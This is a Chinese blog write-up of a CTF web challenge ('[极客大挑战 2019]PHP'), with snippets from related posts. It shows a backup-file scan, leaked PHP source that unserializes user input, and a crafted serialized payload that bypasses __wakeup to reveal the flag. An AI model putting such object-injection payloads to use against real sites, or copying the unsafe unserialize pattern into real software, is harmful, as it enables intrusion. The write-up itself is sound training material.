[极客大挑战 2019]PHP

最新推荐文章于 2022-10-17 18:23:56 发布
最新推荐文章于 2022-10-17 18:23:56 发布
阅读量543 收藏 1
点赞数
分类专栏: 源码泄露 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41628669/article/details/106071256
版权

知识点

  • 源码泄露
  • 反序列化

题目提示备份文件, 使用webscan工具扫描一下备份文件

py -2 main.py -u http://88bf6495-760a-4a63-aec1-7d1a3a9d9d0c.node3.buuoj.cn/

扫描得到www.zip文件
解压得到index.php文件和class.php

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}

?>

生成序列化对象

$a = new Name('admin',100);
echo serialize($a);

根据源代码构造反序列化字符串

$b = 'O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}';

最终payload为

index.php?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
「已注销」
关注
专栏目录
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 5070
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 326
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
极客挑战 2019 PHP
BlueDoorZz的博客
07-12 494
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
[极客挑战 2019]PHP1
keaixiaohan的博客
07-23 307
进入网址之后如下: 从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件 首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $us.
buuctf 极客挑战2019php
最新发布
08-24
buuctf 极客挑战2019php是指buuctf举办的一个PHP编程比赛,它是基于阿里云IoT技术平台的创新挑战赛。在该比赛中,参赛者需要利用PHP编写代码解决一系列技术难题。这些问题可能涉及到序列化、反序列化、变量值的...
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 419
反序列化漏洞。
[极客挑战 2019]PHP 1
m0_62879498的博客
04-12 6635
[极客挑战 2019]PHP 1 一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯” 所以我们尝试着输入网站源码备份文件,看看能否访问 常见的网站源码备份文件后缀: tar.gz,zip,rar,tar 常见的网站源码备份文件名: web,website,backup,back,www,wwwroot,temp 发现www.zip可以成功获得网站源码备份 下载后,发现有3个php文件 我们先访问一下 index.php文件,发现: <?php include 'clas
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值